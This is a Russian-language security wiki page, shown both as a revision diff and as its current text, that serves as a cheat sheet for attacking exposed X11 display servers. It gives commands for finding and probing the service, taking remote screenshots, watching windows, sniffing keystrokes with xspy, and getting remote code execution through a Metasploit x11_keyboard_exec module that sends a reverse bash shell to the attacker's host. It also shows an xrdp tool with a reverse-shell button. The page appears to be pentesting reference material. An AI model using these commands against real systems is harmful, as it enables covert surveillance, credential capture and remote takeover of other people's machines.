X11 all — различия между версиями

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск
(Новая страница: « =Разведка= ==Поиск сервиса== ===nmap=== <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > nmap target -p 600…»)
 
м (Ссылки)
 
(не показаны 4 промежуточные версии этого же участника)
Строка 8: Строка 8:
 
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
 
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
 
nmap target -p 6000 --script x11-access
 
nmap target -p 6000 --script x11-access
 +
</syntaxhighlight>
 +
 +
==Проверка подключения==
 +
 +
===xdpyinfo===
 +
 +
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
 +
xdpyinfo -display <ip>:<display>
 
</syntaxhighlight>
 
</syntaxhighlight>
  
Строка 28: Строка 36:
 
convert screenshot.xwd screenshot.png
 
convert screenshot.xwd screenshot.png
 
</syntaxhighlight>
 
</syntaxhighlight>
 +
 +
==Слежка за экраном==
 +
 +
===xwatchwin===
 +
 +
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
 +
./xwatchwin target:0 -w window_id
 +
</syntaxhighlight>
 +
  
 
==Сниффер==
 
==Сниффер==
Строка 54: Строка 71:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
 +
===xrdp===
 +
 +
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
 +
./xrdp.py <target:0> --no-disp
 +
</syntaxhighlight>
 +
 +
Там будет кнопка R-Shell
  
 
=Ссылки=
 
=Ссылки=
  
 
[https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал]
 
[https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал]
 +
 +
[https://book.hacktricks.xyz/pentesting/6000-pentesting-x11 Подробный туториал]

Текущая версия на 13:24, 30 апреля 2020

Разведка

Поиск сервиса

nmap

1 nmap target -p 6000 --script x11-access

Проверка подключения

xdpyinfo

1 xdpyinfo -display <ip>:<display>

Информация об окнах

xwininfo

1 xwininfo -root -tree -display target:0

Атаки

Скриншоты

xwd

1 xwd -root -screen -silent -display target:0 > screenshot.xwd
2 convert screenshot.xwd screenshot.png

Слежка за экраном

xwatchwin

1 ./xwatchwin target:0 -w window_id


Сниффер

Сниффать нажатия

xspy

1 xspy target


RCE

x11_keyboard_exec

1 use unix/x11/x11_keyboard_exec
2 set rhost target
3 set payload cmd/unix/reverse_bash
4 set lhost myip
5 set lport myport
6 set time_wait 10
7 run

xrdp

1 ./xrdp.py <target:0> --no-disp

Там будет кнопка R-Shell

Ссылки

x11 туториал

Подробный туториал